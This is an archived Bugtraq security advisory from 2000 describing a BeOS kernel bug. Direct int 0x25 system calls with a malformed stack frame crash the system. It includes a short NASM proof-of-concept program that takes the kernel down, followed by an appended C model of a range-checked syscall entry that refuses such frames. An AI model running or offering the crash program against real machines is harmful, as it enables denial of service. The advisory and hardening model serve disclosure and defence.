[14492] in bugtraq


BeOS syscall bug

daemon@ATHENA.MIT.EDU (Konstantin Boldyshev)
Mon Apr 10 15:51:30 2000

Message-Id:  <20000410131628.659.qmail@securityfocus.com>
Date:         Mon, 10 Apr 2000 13:16:28 -0000
Reply-To: Konstantin Boldyshev <konst@LINUXASSEMBLY.ORG>
From: Konstantin Boldyshev <konst@LINUXASSEMBLY.ORG>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Summary:

BeOS crashes when a system call with invalid parameters is
issued.

Details:

When using direct kernel calls through int 0x25 (not
libroot.so functions), BeOS dies on most system calls with
invalid parameters/stack. Although Be had registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available; it's a kernel bug.

Here's a sample assembly program that kills BeOS (nasm):

section .text
global _start

_start:

	push	dword msg
	push	dword len
	push	dword 1	;stdout

	mov	eax,3	;sys_write
	int	0x25	;must be a *call* to int 0x25,
			;then everything goes ok; i.e.
			;return address must be on the stack,
			;but it is not

	mov	eax,0x3f	;sys_exit
	int	0x25

msg	db	"hello",0xa
len	equ	$ - msg


(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)

References:

http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing")

http://linuxassembly.org - Linux/UNIX assembly programming
portal
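The check the advisory says the kernel lacks, written out as an added C model that is not BeOS code and not part of the original post: a syscall entry that range-checks every word it reads from the user stack and the buffer pointer itself, so a frame issued without the return address (the advisory's case) or a bogus pointer comes back as -EFAULT instead of a kernel death. The frame layout ([esp] return address, then fd, length, buffer) is inferred from the push order in the sample program; the 4 KiB user memory and error numbers are constructed for the model.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of a 4 KiB user address space (not real BeOS memory). */
#define USER_SIZE 4096u
#define EFAULT 14
#define EINVAL 22
static uint8_t user_mem[USER_SIZE];

/* True only if [addr, addr+len) lies entirely inside user memory. */
static int user_range_ok(uint32_t addr, uint32_t len) {
    return len <= USER_SIZE && addr <= USER_SIZE - len;
}

/* Fetch one 32-bit word from user memory; fails instead of faulting. */
static int get_user32(uint32_t addr, uint32_t *out) {
    if (!user_range_ok(addr, 4)) return -EFAULT;
    memcpy(out, &user_mem[addr], 4);
    return 0;
}

/* Push a word onto the model user stack (grows down), as the advisory's
   "push dword" lines do; *esp is updated in place. */
void user_push(uint32_t *esp, uint32_t value) {
    *esp -= 4;
    memcpy(&user_mem[*esp], &value, 4);
}

/* Hardened sys_write entry.  esp is the user ESP when int 0x25 fired.
   Frame the kernel expects (libroot's stub reaches it via a call):
     [esp]   return address    [esp+4]  fd
     [esp+8] length            [esp+12] buffer
   Each word and the buffer itself are range-checked before use, so a
   frame without the return address, or a bogus pointer, returns -EFAULT
   rather than taking the kernel down. */
int sys_write_hardened(uint32_t esp, char *kbuf, size_t kbuf_size) {
    uint32_t fd, len, buf;
    if (get_user32(esp + 4, &fd) || get_user32(esp + 8, &len) ||
        get_user32(esp + 12, &buf))
        return -EFAULT;
    if (fd != 1 && fd != 2) return -EINVAL;          /* stdout/stderr only */
    if (len > kbuf_size || !user_range_ok(buf, len)) return -EFAULT;
    memcpy(kbuf, &user_mem[buf], len);              /* copy_from_user */
    return (int)len;
}
```

With the advisory's three pushes and no return address, the kernel's [esp+12] read lands past the top of user memory and the call is refused; with a proper frame the same entry copies the six bytes of "hello\n".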

